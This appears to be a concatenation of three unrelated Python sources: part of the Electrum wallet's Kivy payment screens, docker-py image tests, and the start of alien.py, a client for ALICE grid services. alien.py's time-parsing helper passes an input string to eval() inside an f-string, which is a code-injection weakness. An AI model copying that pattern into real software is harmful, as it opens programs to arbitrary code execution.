d.open()
else:
do_pay(False)
else:
raise Exception('unknown invoice type')
def _do_pay_lightning(self, invoice):
attempts = 10
threading.Thread(target=self.app.wallet.lnworker.pay, args=(invoice['invoice'], invoice['amount'], attempts)).start()
def _do_pay_onchain(self, invoice, rbf):
# make unsigned transaction
outputs = invoice['outputs'] # type: List[TxOutput]
amount = sum(map(lambda x: x.value, outputs))
coins = self.app.wallet.get_spendable_coins(None)
try:
tx = self.app.wallet.make_unsigned_transaction(coins, outputs, None)
except NotEnoughFunds:
self.app.show_error(_("Not enough funds"))
return
except Exception as e:
traceback.print_exc(file=sys.stdout)
self.app.show_error(repr(e))
return
if rbf:
tx.set_rbf(True)
fee = tx.get_fee()
msg = [
_("Amount to be sent") + ": " + self.app.format_amount_and_units(amount),
_("Mining fee") + ": " + self.app.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.app.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append(_("Additional fees") + ": " + self.app.format_amount_and_units(x_fee_amount))
feerate_warning = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > feerate_warning * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
msg.append(_("Enter your PIN code to proceed"))
self.app.protected('\n'.join(msg), self.send_tx, (tx, invoice))
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx, invoice)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
def expiry(self):
return self.app.electrum_config.get('request_expiry', 3600) # 1 hour
def clear(self):
self.screen.address = ''
self.screen.amount = ''
self.screen.message = ''
self.screen.lnaddr = ''
def set_address(self, addr):
self.screen.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.screen.status = ''
if req:
self.screen.message = req.get('memo', '')
amount = req.get('amount')
self.screen.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.screen.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum.util import create_bip21_uri
amount = self.screen.amount
if amount:
a, u = self.screen.amount.split()
assert u == self.app.base_unit
amount = Decimal(a) * pow(10, self.app.decimal_point())
return create_bip21_uri(self.screen.address, amount, self.screen.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.screen.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.screen.message
if lightning:
key = self.app.wallet.lnworker.add_request(amount, message, self.expiry())
else:
addr = self.screen.address or self.app.wallet.get_unused_address()
if not addr:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.screen.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req):
is_lightning = req.get('type') == PR_TYPE_LN
if not is_lightning:
address = req['address']
key = address
else:
key = req['rhash']
address = req['invoice']
amount = req.get('amount')
description = req.get('memo', '')
status, status_str = get_request_status(req)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description
ci['status'] = status_str
ci['is_expired'] = status == PR_EXPIRED
return ci
def update(self):
if not self.loaded:
return
_list = self.app.wallet.get_sorted_requests()
requests_container = self.screen.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list if item.get('status') != PR_PAID]
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
def clear_requests_dialog(self):
requests = self.app.wallet.get_sorted_requests()
expired = [req for req in requests if get_request_status(req)[0] == PR_EXPIRED]
if len(expired) == 0:
return
def callback(c):
if c:
for req in expired:
key = req.get('rhash') or req['address']
self.app.wallet.delete_request(key)
self.update()
d = Question(_('Delete expired requests?'), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
image_test.py | import contextlib
import json
import shutil
import socket
import tarfile
import tempfile
import threading
import pytest
import six
from six.moves import BaseHTTPServer
from six.moves import socketserver
import docker
from .. import helpers
BUSYBOX = helpers.BUSYBOX
class ListImagesTest(helpers.BaseTestCase):
def test_images(self):
res1 = self.client.images(all=True)
self.assertIn('Id', res1[0])
res10 = res1[0]
self.assertIn('Created', res10)
self.assertIn('RepoTags', res10)
distinct = []
for img in res1:
if img['Id'] not in distinct:
distinct.append(img['Id'])
self.assertEqual(len(distinct), self.client.info()['Images'])
def test_images_quiet(self):
res1 = self.client.images(quiet=True)
self.assertEqual(type(res1[0]), six.text_type)
class PullImageTest(helpers.BaseTestCase):
def test_pull(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
res = self.client.pull('hello-world')
self.tmp_imgs.append('hello-world')
self.assertEqual(type(res), six.text_type)
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
def test_pull_streaming(self):
try:
self.client.remove_image('hello-world')
except docker.errors.APIError:
pass
stream = self.client.pull('hello-world', stream=True)
self.tmp_imgs.append('hello-world')
for chunk in stream:
if six.PY3:
chunk = chunk.decode('utf-8')
json.loads(chunk) # ensure chunk is a single, valid JSON blob
self.assertGreaterEqual(
len(self.client.images('hello-world')), 1
)
img_info = self.client.inspect_image('hello-world')
self.assertIn('Id', img_info)
class CommitTest(helpers.BaseTestCase):
def test_commit(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
img = self.client.inspect_image(img_id)
self.assertIn('Container', img)
self.assertTrue(img['Container'].startswith(id))
self.assertIn('ContainerConfig', img)
self.assertIn('Image', img['ContainerConfig'])
self.assertEqual(BUSYBOX, img['ContainerConfig']['Image'])
busybox_id = self.client.inspect_image(BUSYBOX)['Id']
self.assertIn('Parent', img)
self.assertEqual(img['Parent'], busybox_id)
class RemoveImageTest(helpers.BaseTestCase):
def test_remove(self):
container = self.client.create_container(BUSYBOX, ['touch', '/test'])
id = container['Id']
self.client.start(id)
self.tmp_containers.append(id)
res = self.client.commit(id)
self.assertIn('Id', res)
img_id = res['Id']
self.tmp_imgs.append(img_id)
self.client.remove_image(img_id, force=True)
images = self.client.images(all=True)
res = [x for x in images if x['Id'].startswith(img_id)]
self.assertEqual(len(res), 0)
class ImportImageTest(helpers.BaseTestCase):
'''Base class for `docker import` test cases.'''
TAR_SIZE = 512 * 1024
def write_dummy_tar_content(self, n_bytes, tar_fd):
def extend_file(f, n_bytes):
f.seek(n_bytes - 1)
f.write(bytearray([65]))
f.seek(0)
tar = tarfile.TarFile(fileobj=tar_fd, mode='w')
with tempfile.NamedTemporaryFile() as f:
extend_file(f, n_bytes)
tarinfo = tar.gettarinfo(name=f.name, arcname='testdata')
tar.addfile(tarinfo, fileobj=f)
tar.close()
@contextlib.contextmanager
def dummy_tar_stream(self, n_bytes):
'''Yields a stream that is valid tar data of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file
@contextlib.contextmanager
def dummy_tar_file(self, n_bytes):
'''Yields the name of a valid tar file of size n_bytes.'''
with tempfile.NamedTemporaryFile() as tar_file:
self.write_dummy_tar_content(n_bytes, tar_file)
tar_file.seek(0)
yield tar_file.name
def test_import_from_bytes(self):
with self.dummy_tar_stream(n_bytes=500) as f:
content = f.read()
# The generic import_image() function cannot import in-memory bytes
# data that happens to be represented as a string type, because
# import_image() will try to use it as a filename and usually then
# trigger an exception. So we test the import_image_from_data()
# function instead.
statuses = self.client.import_image_from_data(
content, repository='test/import-from-bytes')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_file(self):
with self.dummy_tar_file(n_bytes=self.TAR_SIZE) as tar_filename:
# statuses = self.client.import_image(
# src=tar_filename, repository='test/import-from-file')
statuses = self.client.import_image_from_file(
tar_filename, repository='test/import-from-file')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
def test_import_from_stream(self):
with self.dummy_tar_stream(n_bytes=self.TAR_SIZE) as tar_stream:
statuses = self.client.import_image(
src=tar_stream, repository='test/import-from-stream')
# statuses = self.client.import_image_from_stream(
# tar_stream, repository='test/import-from-stream')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
@contextlib.contextmanager
def temporary_http_file_server(self, stream):
'''Serve data from an IO stream over HTTP.'''
class Handler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header('Content-Type', 'application/x-tar')
self.end_headers()
shutil.copyfileobj(stream, self.wfile)
server = socketserver.TCPServer(('', 0), Handler)
thread = threading.Thread(target=server.serve_forever)
thread.setDaemon(True)
thread.start()
yield 'http://%s:%s' % (socket.gethostname(), server.server_address[1])
server.shutdown()
@pytest.mark.skipif(True, reason="Doesn't work inside a container - FIXME")
def test_import_from_url(self):
# The crappy test HTTP server doesn't handle large files well, so use
# a small file.
tar_size = 10240
with self.dummy_tar_stream(n_bytes=tar_size) as tar_data:
with self.temporary_http_file_server(tar_data) as url:
statuses = self.client.import_image(
src=url, repository='test/import-from-url')
result_text = statuses.splitlines()[-1]
result = json.loads(result_text)
self.assertNotIn('error', result)
self.assertIn('status', result)
img_id = result['status']
self.tmp_imgs.append(img_id)
|
alien.py | #!/usr/bin/env python3
"""Executable/module for interaction with GRID services of ALICE experiment"""
import sys
if sys.version_info[0] != 3 or sys.version_info[1] < 6:
print("This packages requires a minimum of Python version 3.6", file=sys.stderr, flush = True)
sys.exit(1)
import os
import atexit
import re
import subprocess
import signal
import json
import traceback
import logging
import ssl
import uuid
import statistics
import collections
import multiprocessing as mp
from typing import Union
from typing import NamedTuple
import shlex
import tempfile
import time
import datetime
from pathlib import Path
from urllib.parse import urlparse
import urllib.request as urlreq
import socket
import threading
import asyncio
import pwd
import grp
import xml.dom.minidom
import xml.etree.ElementTree as ET
import zipfile
if not os.getenv('ALIENPY_NO_STAGGER'):
try:
import async_stagger
except Exception as e:
print("async_stagger module could not be load", file=sys.stderr, flush = True)
sys.exit(1)
try:
import OpenSSL
except Exception as e:
print("websockets module could not be load", file=sys.stderr, flush = True)
sys.exit(1)
try:
import websockets
from websockets.extensions import permessage_deflate as _wb_permessage_deflate
except Exception as e:
print("websockets module could not be load", file=sys.stderr, flush = True)
sys.exit(1)
try:
from XRootD import client as xrd_client
_HAS_XROOTD = True
except Exception as e:
_HAS_XROOTD = False
try:
import rich
from rich.pretty import pprint
except Exception as e:
print("rich module could not be load", file=sys.stderr, flush = True)
try:
import readline as rl
_HAS_READLINE = True
except ImportError:
try:
import gnureadline as rl
_HAS_READLINE = True
except ImportError:
_HAS_READLINE = False
deque = collections.deque
ALIENPY_VERSION_DATE = '20211202_153804'
ALIENPY_VERSION_STR = '1.3.7'
ALIENPY_EXECUTABLE = ''
##################################################
# GLOBAL POINTER TO WB CONNECTION #############
__SESSION_WB = None
##################################################
_HAS_TTY = sys.stdout.isatty()
_HAS_COLOR = _HAS_TTY # if it has tty then it supports colors
_NCPU = mp.cpu_count()
REGEX_PATTERN_TYPE = type(re.compile('.'))
guid_regex = re.compile('[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}', re.IGNORECASE) # regex for identification of GUIDs
cmds_split = re.compile(';|\n') # regex for spliting chained commands
specs_split = re.compile('@|,') # regex for spliting the specification of cp command
lfn_prefix_re = re.compile('(alien|file){1}(:|/{2})+') # regex for identification of lfn prefix
ignore_comments_re = re.compile('^\\s*(#|;|//)+', re.MULTILINE) # identifiy a range of comments
emptyline_re = re.compile('^\\s*$', re.MULTILINE) # whitespace line
# environment debug variable
_JSON_OUT = bool(os.getenv('ALIENPY_JSON'))
_JSON_OUT_GLOBAL = _JSON_OUT
_DEBUG = os.getenv('ALIENPY_DEBUG', '')
_DEBUG_FILE = os.getenv('ALIENPY_DEBUG_FILE', f'{Path.home().as_posix()}/alien_py.log')
_TIME_CONNECT = os.getenv('ALIENPY_TIMECONNECT', '')
_TMPDIR = os.getenv('TMPDIR', '/tmp')
_DEBUG_TIMING = os.getenv('ALIENPY_TIMING', '') # enable really detailed timings in logs
# global session state;
AlienSessionInfo = {'alienHome': '', 'currentdir': '', 'prevdir': '', 'commandlist': [], 'user': '', 'exitcode': int(-1), 'session_started': False,
'cmd2func_map_nowb': {}, 'cmd2func_map_client': {}, 'cmd2func_map_srv': {}, 'templist': [], 'use_usercert': False, 'alias_cache': {},
'pathq': deque([]), 'show_date': False, 'show_lpwd': False}
if _HAS_READLINE:
def setupHistory():
"""Setup up history mechanics for readline module"""
histfile = os.path.join(os.path.expanduser("~"), ".alienpy_history")
if not os.path.exists(histfile): open(histfile, 'wb').close()
rl.set_history_length(-1) # unlimited history
rl.read_history_file(histfile)
def startup_hook(): rl.append_history_file(1, histfile) # before next prompt save last line
rl.set_startup_hook(startup_hook)
def _is_valid_xrootd() -> bool:
if not _HAS_XROOTD: return False
xrd_ver_arr = xrd_client.__version__.split(".")
if len(xrd_ver_arr) > 1:
_XRDVER_1 = xrd_ver_arr[0][1:] if xrd_ver_arr[0].startswith('v') else xrd_ver_arr[0] # take out the v if present
_XRDVER_2 = xrd_ver_arr[1]
return True if int(_XRDVER_1) >= 5 and int(_XRDVER_2) > 2 else False
else: # version is not of x.y.z form, this is git based form
xrdver_git = xrd_ver_arr[0].split("-")
_XRDVER_1 = xrdver_git[0][1:] if xrdver_git[0].startswith('v') else xrdver_git[0] # take out the v if present
_XRDVER_2 = xrdver_git[1]
return True if int(_XRDVER_1) > 20211113 else False
# use only 5.3 versions and up - reference point
_HAS_XROOTD = _is_valid_xrootd()
_HAS_XROOTD_GETDEFAULT = False
if _HAS_XROOTD:
def XRD_EnvPut(key, value):
"""Sets the given key in the xrootd client environment to the given value.
Returns false if there is already a shell-imported setting for this key, true otherwise"""
if str(value).isdigit():
return xrd_client.EnvPutInt(key, value)
else:
return xrd_client.EnvPutString(key, value)
# Override the application name reported to the xrootd server.
XRD_EnvPut('XRD_APPNAME', f'alien.py/{ALIENPY_VERSION_STR} xrootd/{xrd_client.__version__}')
_HAS_XROOTD_GETDEFAULT = hasattr(xrd_client, 'EnvGetDefault')
class COLORS(NamedTuple): # pylint: disable=inherit-non-class
"""Collection of colors for terminal printing"""
ColorReset = '\033[00m' # Text Reset
Black = '\033[0;30m' # Black
Red = '\033[0;31m' # Red
Green = '\033[0;32m' # Green
Yellow = '\033[0;33m' # Yellow
Blue = '\033[0;34m' # Blue
Purple = '\033[0;35m' # Purple
Cyan = '\033[0;36m' # Cyan
White = '\033[0;37m' # White
BBlack = '\033[1;30m' # Bold Black
BRed = '\033[1;31m' # Bold Red
BGreen = '\033[1;32m' # Bold Green
BYellow = '\033[1;33m' # Bold Yellow
BBlue = '\033[1;34m' # Bold Blue
BPurple = '\033[1;35m' # Bold Purple
BCyan = '\033[1;36m' # Bold Cyan
BWhite = '\033[1;37m' # Bold White
UBlack = '\033[4;30m' # Underline Black
URed = '\033[4;31m' # Underline Red
UGreen = '\033[4;32m' # Underline Green
UYellow = '\033[4;33m' # Underline Yellow
UBlue = '\033[4;34m' # Underline Blue
UPurple = '\033[4;35m' # Underline Purple
UCyan = '\033[4;36m' # Underline Cyan
UWhite = '\033[4;37m' # Underline White
IBlack = '\033[0;90m' # High Intensity Black
IRed = '\033[0;91m' # High Intensity Red
IGreen = '\033[0;92m' # High Intensity Green
IYellow = '\033[0;93m' # High Intensity Yellow
IBlue = '\033[0;94m' # High Intensity Blue
IPurple = '\033[0;95m' # High Intensity Purple
ICyan = '\033[0;96m' # High Intensity Cyan
IWhite = '\033[0;97m' # High Intensity White
BIBlack = '\033[1;90m' # Bold High Intensity Black
BIRed = '\033[1;91m' # Bold High Intensity Red
BIGreen = '\033[1;92m' # Bold High Intensity Green
BIYellow = '\033[1;93m' # Bold High Intensity Yellow
BIBlue = '\033[1;94m' # Bold High Intensity Blue
BIPurple = '\033[1;95m' # Bold High Intensity Purple
BICyan = '\033[1;96m' # Bold High Intensity Cyan
BIWhite = '\033[1;97m' # Bold High Intensity White
On_Black = '\033[40m' # Background Black
On_Red = '\033[41m' # Background Red
On_Green = '\033[42m' # Background Green
On_Yellow = '\033[43m' # Background Yellow
On_Blue = '\033[44m' # Background Blue
On_Purple = '\033[45m' # Background Purple
On_Cyan = '\033[46m' # Background Cyan
On_White = '\033[47m' # Background White
On_IBlack = '\033[0;100m' # High Intensity backgrounds Black
On_IRed = '\033[0;101m' # High Intensity backgrounds Red
On_IGreen = '\033[0;102m' # High Intensity backgrounds Green
On_IYellow = '\033[0;103m' # High Intensity backgrounds Yellow
On_IBlue = '\033[0;104m' # High Intensity backgrounds Blue
On_IPurple = '\033[0;105m' # High Intensity backgrounds Purple
On_ICyan = '\033[0;106m' # High Intensity backgrounds Cyan
On_IWhite = '\033[0;107m' # High Intensity backgrounds White
class XrdCpArgs(NamedTuple): # pylint: disable=inherit-non-class
"""Structure to keep the set of xrootd flags used for xrootd copy process"""
overwrite: bool
batch: int
sources: int
chunks: int
chunksize: int
makedir: bool
tpc: str
posc: bool
hashtype: str
streams: int
cksum: bool
timeout: int
rate: int
class CopyFile(NamedTuple): # pylint: disable=inherit-non-class
"""Structure to keep a generic copy task"""
src: str
dst: str
isUpload: bool
token_request: dict
lfn: str
class CommitInfo(NamedTuple): # pylint: disable=inherit-non-class
"""Structure for commit of succesful xrootd write to file catalogue"""
envelope: str
size: str
lfn: str
perm: str
expire: str
pfn: str
se: str
guid: str
md5: str
class lfn2file(NamedTuple): # pylint: disable=inherit-non-class
"""Map a lfn to file (and reverse)"""
lfn: str
file: str
class KV(NamedTuple): # pylint: disable=inherit-non-class
"""Assign a value to a key"""
key: str
val: str
class RET(NamedTuple): # pylint: disable=inherit-non-class
"""Structure for POSIX like function return: exitcode, stdout, stderr, dictionary of server reply"""
exitcode: int = -1
out: str = ''
err: str = ''
ansdict: dict = {}
def print(self, opts = ''):
if 'json' in opts:
if self.ansdict:
json_out = json.dumps(self.ansdict, sort_keys = True, indent = 4)
print_out(json_out)
if _DEBUG: logging.debug(json_out)
else:
print_err('This command did not return a json dictionary')
return
if self.exitcode != 0:
if 'info' in opts: logging.info(self.err)
if 'warn' in opts: logging.warning(self.err)
if 'err' in opts: logging.error(self.err)
if 'debug' in opts: logging.debug(self.err)
if self.err and not ('noerr' in opts or 'noprint' in opts):
print_err(f'{self.err.strip()}')
else:
if self.out and not ('noout' in opts or 'noprint' in opts):
print_out(f'{self.out.strip()}')
__call__ = print
def __bool__(self):
return True if self.exitcode == 0 else False
class ALIEN_COLLECTION_EL(NamedTuple): # pylint: disable=inherit-non-class
"""AliEn style xml collection element strucure"""
name: str = ''
aclId: str = ''
broken: str = ''
ctime: str = ''
dir: str = ''
entryId: str = ''
expiretime: str = ''
gowner: str = ''
guid: str = ''
guidtime: str = ''
jobid: str = ''
lfn: str = ''
md5: str = ''
owner: str = ''
perm: str = ''
replicated: str = ''
size: str = ''
turl: str = ''
type: str = ''
class Msg:
"""Class to create json messages to be sent to server"""
__slots__ = ('cmd', 'args', 'opts')
def __init__(self, cmd = '', args = None, opts = ''):
self.cmd = cmd
self.opts = opts
if not args:
self.args = []
elif isinstance(args, str):
self.args = shlex.split(args)
elif isinstance(args, list):
self.args = args.copy()
def add_arg(self, arg):
if isinstance(arg, str): self.args.extend(shlex.split(arg))
if isinstance(arg, list): self.args.extend(arg)
def dict(self):
return CreateJsonCommand(self.cmd, self.args, self.opts, True)
def str(self):
return CreateJsonCommand(self.cmd, self.args, self.opts)
def __call__(self):
return (self.cmd, self.args, self.opts)
def __bool__(self):
return True if self.cmd else False
class AliEn:
"""Class to be used as advanced API for interaction with central servers"""
__slots__ = ('internal_wb', 'opts')
def __init__(self, opts = ''):
self.internal_wb = InitConnection()
self.opts = opts
def run(self, cmd, opts = '') -> Union[RET, str]:
"""SendMsg to server a string command, a RET object will be returned"""
if not opts: opts = self.opts
return SendMsg(self.internal_wb, cmd, opts = opts)
def ProcessMsg(self, cmd, opts = '') -> int:
"""ProcessCommandChain - the app main function to process a (chain of) command(s)"""
if not opts: opts = self.opts
return ProcessCommandChain(self.internal_wb, cmd)
def wb(self):
"""Get the websocket, to be used in other functions"""
return self.internal_wb
def help(self): # pylint: disable=no-self-use
"""Print help message"""
print_out('Methods of AliEn session:\n'
'.run(cmd, opts) : alias to SendMsg(cmd, opts); It will return a RET object: named tuple (exitcode, out, err, ansdict)\n'
'.ProcessMsg(cmd_list) : alias to ProcessCommandChain, it will have the same output as in the alien.py interaction\n'
'.wb() : return the session WebSocket to be used with other function within alien.py')
def signal_handler(sig, frame): # pylint: disable=unused-argument
"""Generig signal handler: just print the signal and exit"""
print_out(f'\nCought signal {sig}, let\'s exit')
exit_message(int(AlienSessionInfo['exitcode']))
def exit_message(code: int = 0, msg = ''):
"""Exit with msg and with specied code"""
print_out(msg if msg else 'Exit')
sys.exit(code)
def is_guid(guid: str) -> bool:
"""Recognize a GUID format"""
return bool(guid_regex.fullmatch(guid)) # identify if argument in an AliEn GUID
def run_function(function_name: str, *args, **kwargs):
"""Python code:: run some arbitrary function name (found in globals) with arbitrary arguments"""
return globals()[function_name](*args, *kwargs) # run arbitrary function
def print_out(msg: str, toLog: bool = False):
if toLog:
logging.log(90, msg)
else:
print(msg, flush = True)
def print_err(msg: str, toLog: bool = False):
if toLog:
logging.log(95, msg)
else:
print(msg, file=sys.stderr, flush = True)
def isfloat(arg: Union[str, float, None]) -> bool:
if not arg: return False
return str(arg).replace('.', '', 1).isdigit()
def time_unix2simple(time_arg: Union[str, int, None]) -> str:
if not time_arg: return ''
return datetime.datetime.fromtimestamp(time_arg).replace(microsecond=0).isoformat().replace('T', ' ')
def time_str2unixmili(time_arg: Union[str, int, None]) -> int:
if not time_arg:
return int((datetime.datetime.utcnow() - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
time_arg = str(time_arg)
if (time_arg.isdigit() or isfloat(time_arg)) and (len(time_arg) != 10 or len(time_arg) != 13): return int(-1)
if isfloat(time_arg) and len(time_arg) == 10:
return int(float(time_arg) * 1000)
if time_arg.isdigit() and len(time_arg) == 13:
return int(time_arg)
# asume that this is a strptime arguments in the form of: time_str, format_str
try:
time_obj = eval(f"datetime.datetime.strptime({time_arg})")
return int((time_obj - datetime.datetime(1970, 1, 1)).total_seconds() * 1000)
except Exception as e:
return int(-1)
#########################
# ASYNCIO MECHANICS
#########################
def start_asyncio():
"""Initialization of main thread that will keep the asyncio loop"""
loop = None
ready = threading.Event()
def _cancel_all_tasks(loop):
if sys.version_info[1] < 8:
to_cancel = asyncio.Task.all_tasks(loop) # pylint: disable=no-member # asyncio.tasks
else:
to_cancel = asyncio.all_tasks(loop) # asyncio.tasks
if not to_cancel: return
for task in to_cancel: task.cancel()
loop.run_until_complete(asyncio.tasks.gather(*to_cancel, loop=loop, return_exceptions=True))
for task in to_cancel:
if task.cancelled(): continue
if task.exception() is not None:
loop.call_exception_handler({'message': 'unhandled exception during asyncio.run() shutdown', 'exception': task.exception(), 'task': task, })
def run(mainasync, *, debug=False):
if asyncio.events._get_running_loop() is not None: raise RuntimeError("asyncio.run() cannot be called from a running event loop") # pylint: disable=protected-access
if not asyncio.coroutines.iscoroutine(mainasync): raise ValueError("a coroutine was expected, got {!r}".format(mainasync))
loop = asyncio.events.new_event_loop()
try:
asyncio.events.set_event_loop(loop)
loop.set_debug(debug)
return loop.run_until_complete(mainasync)
finally:
try:
_cancel_all_tasks(loop)
loop.run_until_complete(loop.shutdown_asyncgens())
finally:
asyncio.events.set_event_loop(None)
loop.close()
async def wait_forever():
nonlocal loop
loop = asyncio.get_event_loop()
ready.set()
await loop.create_future()
threading.Thread(daemon=True, target=run, args=(wait_forever(),)).start()
ready.wait()
return loop
# GLOBAL STATE ASYNCIO LOOP !!! REQUIRED TO BE GLOBAL !!!
_alienpy_global_asyncio_loop = start_asyncio()
def syncify(fn):
"""DECORATOR FOR SYNCIFY FUNCTIONS:: the magic for un-async functions"""
def syncfn(*args, **kwds):
# submit the original coroutine to the event loop and wait for the result
conc_future = asyncio.run_coroutine_threadsafe(fn(*args, **kwds), _alienpy_global_asyncio_loop)
return conc_future.result()
syncfn.as_async = fn
return syncfn
@syncify
async def IsWbConnected(wb) -> bool:
"""Check if websocket is connected with the protocol ping/pong"""
time_begin = None
if _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
if _DEBUG:
logging.info(f"Called from: {sys._getframe().f_back.f_code.co_name}") # pylint: disable=protected-access
try:
pong_waiter = await wb.ping()
await pong_waiter
except Exception as e:
logging.debug('WB ping/pong failed!!!')
logging.exception(e)
return False
if time_begin: logging.error(f">>>IsWbConnected time = {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms")
return True
@syncify
async def wb_close(wb, code, reason):
"""Send close to websocket"""
await wb.close(code = code, reason = reason)
@syncify
async def msg_proxy(websocket, use_usercert = False):
"""Proxy messages from a connection point to another"""
wb_jalien = AlienConnect(None, use_usercert)
local_query = await websocket.recv()
jalien_answer = await SendMsg(wb_jalien, local_query)
await websocket.send(jalien_answer.ansdict)
@syncify
async def __sendmsg(wb, jsonmsg: str) -> str:
"""The low level async function for send/receive"""
time_begin = None
if _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
await wb.send(jsonmsg)
result = await wb.recv()
if time_begin: logging.debug(f">>>__sendmsg time = {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms")
return result
@syncify
async def __sendmsg_multi(wb, jsonmsg_list: list) -> list:
"""The low level async function for send/receive multiple messages once"""
if not jsonmsg_list: return []
time_begin = None
if _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
for msg in jsonmsg_list: await wb.send(msg)
result_list = []
for i in range(len(jsonmsg_list)):
result = await wb.recv()
result_list.append(result)
if time_begin: logging.debug(f">>>__sendmsg time = {(datetime.datetime.now().timestamp() - time_begin) * 1000:.3f} ms")
return result_list
def SendMsg(wb, cmdline: str, args: Union[None, list] = None, opts: str = '') -> Union[RET, str]:
"""Send a json message to the specified websocket; it will return the server answer"""
if not wb:
msg = "SendMsg:: websocket not initialized"
logging.info(msg)
return '' if 'rawstr' in opts else RET(1, '', msg)
if not args: args = []
time_begin = None
if _DEBUG or _DEBUG_TIMING: time_begin = datetime.datetime.now().timestamp()
if _JSON_OUT_GLOBAL or _JSON_OUT or _DEBUG: # if jsout output was requested, then make sure we get the full answer
opts = opts.replace('nokeys', '').replace('nomsg', '')
if '{"command":' in cmdline and '"options":' in cmdline: # seems as json input
jsonmsg = cmdline
else:
jsonmsg = CreateJsonCommand(cmdline, args, opts) # nomsg/nokeys will be passed to CreateJsonCommand
if not jsonmsg:
logging.info("SendMsg:: json message is empty!")
return '' if 'rawstr' in opts else RET(1, '', f"SendMsg:: empty json with args:: {cmdline} {' '.join(args)} /opts= {opts}")
if _DEBUG:
logging.debug(f"Called from: {sys._getframe().f_back.f_code.co_name}\nSEND COMMAND:: {jsonmsg}") # pylint: disable=protected-access
